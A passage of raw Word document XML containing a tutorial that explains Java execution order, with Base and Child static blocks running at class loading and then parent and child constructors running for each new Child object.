          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Child Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E74085B" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A static block prints "Child Static".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44717827" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A constructor prints "Child Constructor".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501B5BFD" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Main Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A4E15C" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Two instances of Child are created and assigned to Base references.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04666835" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Execution Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B86E4D" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Step 1: Static Block Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296C70E4" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When the main() method is executed, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>static blocks</w:t>
      </w:r>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are executed first (for the class loading process).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4033AA67" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Loading of the Base class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191D0783" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The Base class is loaded when we create an instance of Child because Child inherits from Base.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B5FB1E" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The static block of Base executes first, printing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256F6F2A" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Base Static</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0859C0" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Loading of the Child class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E67FD22" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Next, the Child class is loaded. The static block in Child is executed after the Base static block, printing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3666C7C9" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Child Static</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200B39F8" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Step 2: Object Creation (Constructor Execution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BBB1AA" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>First Object Creation (child1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609BA70A" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="004E7A22">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The first Child object is created with the statement:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Base child1 = new Child();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E641422" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Constructor Execution Order:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70652C99" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The constructor of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parent class</w:t>
      </w:r>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Base) is invoked first because every child class constructor implicitly calls its parent class constructor (either explicitly or implicitly).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746CD806" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thus, the Base constructor runs first, printing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA8547F" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Base Constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABE386B" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Child Constructor Execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E874820" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">After the parent class constructor completes, the constructor of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>child class</w:t>
      </w:r>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Child) executes, printing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E6B2A4" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Child Constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B600E34" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Second Object Creation (child2):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0DA573" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="004E7A22">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The second Child object is created with the statement:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Base child2 = new Child();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59910E55" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Constructor Execution Order (Again):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDFBFC0" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
